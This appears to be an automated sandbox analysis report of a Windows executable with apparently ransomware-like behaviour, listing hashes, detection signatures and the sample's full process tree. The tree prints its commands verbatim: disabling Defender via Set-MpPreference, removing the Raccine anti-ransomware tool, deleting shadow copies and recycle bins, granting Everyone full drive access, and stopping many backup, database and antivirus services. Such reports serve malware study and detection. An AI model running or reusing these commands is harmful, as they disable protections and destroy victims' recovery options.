Analysis
-
max time kernel
138s -
max time network
120s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
29-10-2021 14:51
General
-
Target
936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
-
Size
296KB
-
MD5
6b2c7d5298c7fb8f4c4c3531894a91c1
-
SHA1
d7333af03603b27566ac8ab63d6aa21575e1ebb4
-
SHA256
936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd
-
SHA512
2555a572e9088ce58dce5bcaf1c0fca76727b6a1e1315ec0dbfe588a796faf1d083cb6ff3a6362f7c8075a4f321228c6227db7a3207fa557fff68e9fd4a3e114
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
-
Executes dropped EXE 1 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 5 IoCs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Drops file in Windows directory 24 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 57 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe"C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe"1⤵
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
- Drops file in Windows directory
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
- Drops file in Windows directory
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start Dnscache /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start SSDPSRV /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start FDResPub /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c net view2⤵
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\916CA417-15B9-425D-9C3C-92034492F028\dismhost.exeC:\Users\Admin\AppData\Local\Temp\916CA417-15B9-425D-9C3C-92034492F028\dismhost.exe {8871338C-26D8-49AE-9B8A-57204B3180DA}3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop bedbg /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start upnphost /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ekrn /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ntrtscan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPUpdateService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵
-
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysql.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqld.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sql.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM 1cv8.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM rphost.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM rmngr.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ragent.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ARSM /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeimap4 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DCAgent /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AVP /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Antivirus /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROD /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop audioendpointbuilder /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop vapiendpoint /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop WRSVC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKey /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop tmlisten /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLBrowser /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TmCCSF /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update_64 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_service /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_filter /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop svcGenericHost /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophossps /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SntpService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SmcService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Smcinst /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ShMonitor /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SepMasterService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVAdminService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sacsvr /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵
-
-
